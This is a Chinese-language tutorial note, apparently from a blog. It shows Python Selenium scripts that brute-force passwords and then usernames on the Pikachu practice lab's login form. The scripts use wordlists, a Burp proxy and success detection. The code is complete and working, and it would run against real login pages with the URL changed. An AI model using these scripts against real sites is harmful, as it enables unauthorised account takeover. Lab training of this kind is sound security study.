目录
- 直接爆破(基于CSS)
- 直接爆破(基于Xpath)
-
- 爆破密码
- [爆破用户名 & 添加代理](#爆破用户名 & 添加代理)
关于Selenium的语法,参见之前的笔记:上手Selenium
直接爆破(基于CSS)
一次访问
我们可以使用CSS表达式很容易的找到用户名、密码、登录按钮的位置,通过分析登录之后页面的变化,可以找到页面的返回结果,最终得到一个基础的脚本。
python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)
# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear() # 清除输入框已有的字符串
username.send_keys('test') # 输入新字符串
time.sleep(2)
# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear() # 清除输入框已有的字符串
password.send_keys('123') # 输入新字符串
time.sleep(2)
# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)
# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR,'.bf_form_main > p')
print(result.get_attribute('outerHTML'))
# 关闭浏览器
browser.close()
# 结果
<p> username or password is not exists~</p>抓包流量如下
会访问到一个js页面,最后POST请求登录网站,ua也是正常的
添加代理
第6~9行代码,添加bp代理
python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time
# 设置代理IP的地址和端口号,类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)
# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)
# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear() # 清除输入框已有的字符串
username.send_keys('test') # 输入新字符串
time.sleep(2)
# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear() # 清除输入框已有的字符串
password.send_keys('123') # 输入新字符串
time.sleep(2)
# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
time.sleep(2)
# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
print(result.get_attribute('outerHTML'))
# 关闭浏览器
browser.close()开始爆破
尝试固定用户名,爆破密码
python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)
# 设置登录
def login(try_password):
# 清空并输入用户名
username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
username.clear() # 清除输入框已有的字符串
username.send_keys('test') # 输入新字符串
print('尝试用户名:test')
# time.sleep(2)
# 清空并输入密码
password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
password.clear() # 清除输入框已有的字符串
password.send_keys(try_password) # 输入新字符串
print('尝试密码:' + try_password)
# time.sleep(2)
# 点击登录按钮
login = browser.find_element(By.CSS_SELECTOR, '.submit')
login.click()
# time.sleep(2)
# 获取登录结果
result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
print('尝试结果:')
print(result.get_attribute('outerHTML') + '\n')
with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
f = file.readlines()
for i in f:
i = i.strip().replace('\n', '')
login(i)
# 关闭浏览器
browser.close()从流量中可以看到,在网站加载出来后,就开始反复爆破了。
感受一下实时爆破画面
筛选出结果,使用负向后瞻:\<p\>\s(?!username),只要<p> "后面跟的不是username,就显示出来。
直接爆破(基于Xpath)
还是上面的pikachu靶场
爆破密码
- 使用xpath简化代码
- 判断是否登录成功,一旦成功,就终止爆破
python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
time.sleep(2)
# 设置登录
def login(try_password):
# 清空并输入用户名
username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
username.clear() # 清除输入框已有的字符串
username.send_keys('test') # 输入新字符串
# 清空并输入密码,尝试登录
password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
password.clear() # 清除输入框已有的字符串
password.send_keys(try_password + '\n') # 输入新字符串
print('尝试密码:' + try_password)
# 获取登录结果
result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
print('尝试结果:')
print(result.get_attribute('outerHTML') + '\n')
# 判断是否登录成功
if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
print('破解成功,密码:'+try_password)
exit()
with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
f = file.readlines()
for i in f:
i = i.strip().replace('\n', '')
login(i)
# 关闭浏览器
browser.close()爆破用户名 & 添加代理
python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
# 设置代理IP的地址和端口号,类型为 HTTP 代理
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--proxy-server=http://" + proxy_address)
# 浏览器驱动访问网站
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
browser.implicitly_wait(10)
browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
# 设置登录
def login(try_username):
# 清空并输入用户名
username = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[1]/span/input')
username.clear() # 清除输入框已有的字符串
username.send_keys(try_username) # 输入新字符串
print('尝试账号:' + try_username)
# 清空并输入密码,尝试登录
password = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/form/label[2]/span/input')
password.clear() # 清除输入框已有的字符串
password.send_keys('123456' + '\n') # 输入新字符串
# 获取登录结果
result = browser.find_element(By.XPATH, '/html/body/div[2]/div[2]/div/div[2]/div/div/p')
print('尝试结果:')
print(result.get_attribute('outerHTML') + '\n')
# 判断是否登录成功
if 'username or password is not exists' not in str(result.get_attribute('outerHTML')):
print('破解成功,:' + try_username + r'/123456')
exit()
with open(r'C:\Users\asuka\Desktop\test.txt', 'r', encoding='utf8') as file:
f = file.readlines()
for i in f:
i = i.strip().replace('\n', '')
login(i)
# 关闭浏览器
browser.quit()